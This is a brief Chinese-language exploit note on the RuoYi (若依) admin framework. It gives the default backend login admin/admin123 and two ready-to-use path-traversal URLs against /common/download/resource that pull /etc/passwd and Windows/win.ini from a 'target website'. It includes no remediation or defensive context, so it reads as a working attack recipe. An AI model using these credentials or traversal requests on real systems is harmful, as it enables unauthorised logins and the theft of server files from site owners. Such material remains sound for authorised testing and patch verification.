0x01 弱口令漏洞
若依框架后台默认口令:admin/admin123
0x02 后台任意文件下载
通过访问此地址实现任意文件下载
http://目标网站url/common/download/resource?resource=/profile/../../../../etc/passwd
http://目标网站url/common/download/resource?resource=/profile/../../../../Windows/win.ini